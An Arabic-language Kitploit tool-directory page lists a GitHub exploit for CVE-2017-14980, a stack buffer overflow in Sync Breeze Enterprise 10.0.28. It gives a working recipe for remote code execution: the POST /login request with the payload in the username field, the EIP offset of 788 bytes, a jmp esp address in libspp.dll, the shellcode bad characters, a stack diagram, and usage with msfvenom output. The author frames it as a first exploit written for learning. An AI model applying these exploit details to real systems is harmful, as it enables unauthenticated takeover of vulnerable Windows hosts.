Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-14980.RCE — تجاوز سعة المخزن المؤقت في Sync Breeze Enterprise 10.0.28 يسمح للمهاجمين عن بُعد بإحداث تأثير غير محدد عبر معامل اسم مستخدم طويل في /login | Kitploit
أدوات/GitHubGitHub/damariion/cve-2017-14980.rce
الاستغلالشيل كوداستغلال تطبيقات الويبتطوير الحمولاتاستغلال الملفات الثنائيةArchived
GitHubdamariion/cve-2017-14980.rce

CVE-2017-14980.RCE

تجاوز سعة المخزن المؤقت في Sync Breeze Enterprise 10.0.28 يسمح للمهاجمين عن بُعد بإحداث تأثير غير محدد عبر معامل اسم مستخدم طويل في /login

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2017-14980

يستهدف هذا الاستغلال Sync Breeze Enterprise الذي يعمل على Windows 10 (x86, build: 16299)، ويؤثر على الإصدار 10.0.28، حيث يمكن لمهاجم غير مصادَق عليه إحداث تجاوز سعة المخزن المؤقت عبر محتوى طلب HTTP (HTTP-request body)، مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية. يفترض هذا الاستغلال تعطيل جميع وسائل التخفيف الأمنية (مثل ASLR وCFG وDEP).

[!NOTE] طُوّر هذا المشروع أثناء تجربة تجاوزات سعة المخزن المؤقت الأساسية التي تستهدف ملفات ويندوز الثنائية. وهو أول استغلال أُطوّره. الاستغلال يعمل بشكل كامل، وقد نُشر لتوثيق تقدّمي في مجال أبحاث الثغرات وتطوير الاستغلالات.

الخطوات

  1. إرسال طلب HTTP
    يُنشأ الاتصال باستخدام الترويسات والمحتوى التالي:

    root@kitploit:~
    POST /login HTTP/1.1
    Host: <host>
    Content-Type: application/x-www-form-urlencoded
    Content-Length: <payload-length>
    
    username=<payload>&password=?
    
  2. الكتابة فوق سجل eip
    يُستخدم العنوان الثابت 10090c83 الذي يشير إلى تعليمة jmp esp داخل libspp.dll لإعادة توجيه التنفيذ إلى المكدس عند إزاحة البايت 788.

  3. تنفيذ shellcode
    يجب أن يتجنب الـ shellcode المُعدّ الأحرف التالية: \x00\x0a\x0d\x25\x26\x2b\x3d.

الرسم البياني

root@kitploit:~
graph
   
    subgraph "syncbreeze.exe"
        
        b1.0["   
            ...... 41414141
            ...... 41414141
            ...... 41414141
            (eip) <span style="color: cyan">10090c83</span>
        "]

        b1.1["    
            (<span style="color:lime">esp</span>) 90909090
            ...... 90909090
            <span style="color:red">&lt;shellcode&gt;</span>
        "]
        
        b1.0 ~~~ b1.1
    end
        
    subgraph "libspp.dll"
        
        a1.0["`
            (<span style="color:cyan">10090c83</span>) jmp <span style="color:lime">esp</span>
        `"]
    
    end 

    b1.0 --> a1.0
    a1.0 --> b1.1

المعاينة

preview

الاستخدام

root@kitploit:~
python3 exploit.py --host <host> --port <port> --file <file>  
FlagAbout
hostالواجهة التي يستمع عليها Sync Breeze
portالمنفذ الذي يستمع عليه Sync Breeze
fileالمخرجات الخام لـ msfvenom
تنزيل الأداة